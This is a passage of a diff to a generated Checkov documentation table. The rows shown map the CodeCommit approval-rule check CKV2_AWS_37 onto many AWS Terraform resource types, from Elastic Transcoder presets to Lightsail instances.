[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 815 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 816 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 817 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 818 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 819 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 820 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 821 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 822 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 823 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 824 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 825 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 826 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 827 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 828 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 829 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 830 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 831 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 832 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 833 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 834 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 835 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 836 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 837 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 838 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 839 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 840 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 841 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 842 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 843 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 844 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 845 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 846 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 847 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 848 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 849 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 850 | CKV2_AWS_37 | resource 
| aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 851 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 852 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 853 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 854 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 855 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 856 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| +| 857 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 858 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 859 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 860 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 861 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 862 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 863 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 864 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 865 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 866 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 867 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 868 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 869 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 870 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 871 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 872 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 873 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 874 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 875 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 876 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 877 
| CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 878 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 879 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 880 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 881 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 882 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 883 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 884 | 
CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 885 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 886 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 887 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 888 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 889 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 890 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 891 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 892 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 893 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 894 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 895 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 896 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 897 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 898 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 899 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 900 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 901 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 902 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 903 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 904 | CKV2_AWS_37 | resource | 
aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 905 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 906 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 907 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 908 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 909 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 910 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 911 | 
CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 912 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 913 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 914 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 915 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 916 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 917 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | 
